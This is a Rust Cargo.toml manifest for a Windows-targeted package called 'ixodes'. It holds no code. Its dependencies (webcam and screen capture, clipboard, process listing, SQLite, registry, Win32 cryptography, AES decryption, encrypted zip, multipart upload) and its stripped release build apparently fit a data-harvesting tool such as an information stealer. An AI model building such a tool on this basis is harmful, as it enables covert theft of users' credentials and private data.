[package]
name = "ixodes"
version = "0.1.0"
edition = "2024"

[dependencies]
async-trait = "0.1"
thiserror = "1.0"
tokio = { version = "1.45", features = ["rt-multi-thread", "macros", "fs", "io-util", "sync", "process"] }
tracing = "0.1"
tracing-subscriber = { version = "0.3", features = ["fmt", "env-filter"] }
directories = "5.0"
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
image = { version = "0.25", default-features = false, features = ["png"] }
nokhwa = { version = "0.10.10", default-features = false, features = ["input-native"] }
aes-gcm = "0.10"
base64 = "0.21"
libloading = "0.7"
regex = "1.11"
winreg = "0.12"
walkdir = "2.3.3"
quick-xml = "0.27"
roxmltree = "0.18"
reqwest = { version = "0.12", features = ["json", "rustls-tls", "multipart"] }
zip = { version = "7.1.0", default-features = false, features = ["aes-crypto", "deflate"] }
rusqlite = { version = "0.33", features = ["bundled"] }
aes = "0.8.4"
cfb8 = "0.8"
hex = "0.4.3"
once_cell = "1.21"
rand = "0.8"
ntapi = "0.4"

[build-dependencies]
rand = { version = "0.8", features = ["std"] }

[target.'cfg(windows)'.build-dependencies]
winres = "0.1"

[dependencies.windows]
version = "0.52"
features = [
    "Win32_Foundation",
    "Win32_Graphics_Gdi",
    "Win32_Storage_FileSystem",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_System_DataExchange",
    "Win32_System_Ole",
    "Win32_System_Memory",
    "Win32_System_ProcessStatus",
    "Win32_System_Threading",
    "Win32_Security_Cryptography",
    "Win32_System_LibraryLoader",
    "Win32_UI_WindowsAndMessaging",
    "Win32_Globalization",
]

[profile.release]
strip = true
lto = true
codegen-units = 1
panic = "abort"
opt-level = "z"